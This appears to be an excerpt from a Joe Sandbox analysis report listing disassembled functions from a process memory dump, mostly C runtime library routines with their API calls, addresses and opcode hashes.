                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2805327698-0
                                                                                                                                            • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                            • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                            • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                            • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                            Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                            • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                            • __lock.LIBCMT ref: 00414008
                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                            • InterlockedIncrement.KERNEL32(20E71680), ref: 00414050
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4271482742-0
                                                                                                                                            • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                            • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                            • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                            • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                            Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                                            • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                            • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                            • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                            • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                            Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                            • __locking.LIBCMT ref: 0040C791
                                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2395185920-0
                                                                                                                                            • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                            • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                            • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                            • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                            Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fseek_malloc_memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 208892515-0
                                                                                                                                            • Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                            • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                            • Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                            • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                            Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                            • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                            • __locking.LIBCMT ref: 0040BB95
                                                                                                                                            • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3240763771-0
                                                                                                                                            • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                            • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                            • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                            • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                            Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                            • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3058430110-0
                                                                                                                                            • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                            • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                            • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                            • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                            Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                            • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                            • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89